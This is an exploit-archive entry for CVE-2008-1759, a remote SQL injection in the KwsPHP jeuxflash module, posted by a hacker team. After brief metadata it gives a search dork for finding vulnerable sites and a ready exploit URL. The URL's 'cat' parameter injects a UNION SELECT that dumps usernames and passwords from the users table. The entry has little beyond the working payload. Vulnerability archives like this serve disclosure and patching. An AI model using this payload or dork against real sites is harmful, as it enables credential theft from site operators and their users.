KwsPHP Module jeuxflash 1.0 - 'cat' SQL Injection
Author: Houssamix
type: webapps
platform: php
port:
date_added: 2008-04-02
date_updated: 2016-11-17
verified: 1
codes: OSVDB-44357;CVE-2008-1759
tags:
aliases:
screenshot_url:
application_url:
#########################################################################
KwsPHP Module jeuxflash Remote SQL Injection Exploit
#########################################################################
## AUTHOR : HouSSamix From H-T Team
## Script : KwsPHP Module jeuxflash
## Version : last version
## Bug : Remote SQL Injection Exploit
## Dork : inurl:index.php?mod=jeuxflash
## EXPLOITS :
http://server.com/Path/index.php?mod=jeuxflash&cat=-1%20union%20select%201,concat(pseudo,0x3a,pass),3%20from%20users%20where%20id=1--
## GREETZ : All muslims Hackers
#########################################################################
H-T Team { HouSSaMiX _ ToXiC350 }
#########################################################################
# milw0rm.com [2008-04-03]